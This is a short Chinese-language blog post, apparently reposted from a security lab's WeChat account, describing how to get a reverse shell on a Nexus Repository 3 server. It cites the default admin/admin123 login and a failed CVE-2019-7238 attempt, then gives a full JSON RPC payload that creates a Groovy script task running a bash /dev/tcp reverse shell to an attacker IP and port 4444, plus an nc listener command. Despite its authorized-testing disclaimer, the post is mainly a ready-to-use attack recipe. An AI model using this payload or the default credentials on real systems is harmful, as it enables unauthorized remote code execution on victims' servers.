Nexus3之ReverseShell

admin 2021年12月27日18:49:19评论103 views字数 853阅读2分50秒阅读模式


本次仅为学习交流,请遵守《中华人民共和国网络安全法》,勿用于非授权测试,如作他用所承受的法律责任一概与作者无关。



nexus系统是存在于各大企业里十分常见,均为nexus2/3


授权测试:

常见登录默认账号密码为admin/admin123(一般都能登陆进去)

直接搜寻找nexus3 rce poc进行锤击,百度一波下载CVE-2019-7238命令执行按照它打打打

Nexus3之ReverseShell

Nexus3之ReverseShell

这里贴了一个没有写ip的包~其实是失败的,那个包找不到了。

Nexus3之ReverseShell

执行完第一步之后返回true,但是第二步返回500未成功

发现该rce原来是版本并不管用,

Nexus3之ReverseShell


而我的系统确实安全版本15

Nexus3之ReverseShell

尝试使用ReverseShell来进行拿shell

填上然后抓包修改

Nexus3之ReverseShell


发送Poc


```

{"action":"coreui_Task","method":"create","data":[{"id":"","typeId":"script","enabled":true,"name":"ReverseShell","alertEmail":"","schedule":"manual","properties":{"language":"grovy","source":"['/bin/bash','-c','/bin/bash-i >& /dev/tcp/IP_ADDRESS/4444 0>&1'].execute()"},"recuringDays":[],"startDate":null}],"type":"rpc","tid":22}

```


填上ip和监听端口:/IP_ADDRESS/4444

Nexus3之ReverseShell

成功发生包后任务会出现刚刚我们发送的ReverseShell任务


Nexus3之ReverseShell

 

直接run启动该任务

 

Nexus3之ReverseShell 


使用nc进行监听

nc -lvp 4444   


Nexus3之ReverseShell




手握日月摘星辰,安全路上永不止步。

                                                      - Khan攻防安全实验室







本文始发于微信公众号(Khan安全攻防实验室):Nexus3之ReverseShell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月27日18:49:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Nexus3之ReverseShellhttps://cn-sec.com/archives/536555.html

发表评论

匿名网友 填写信息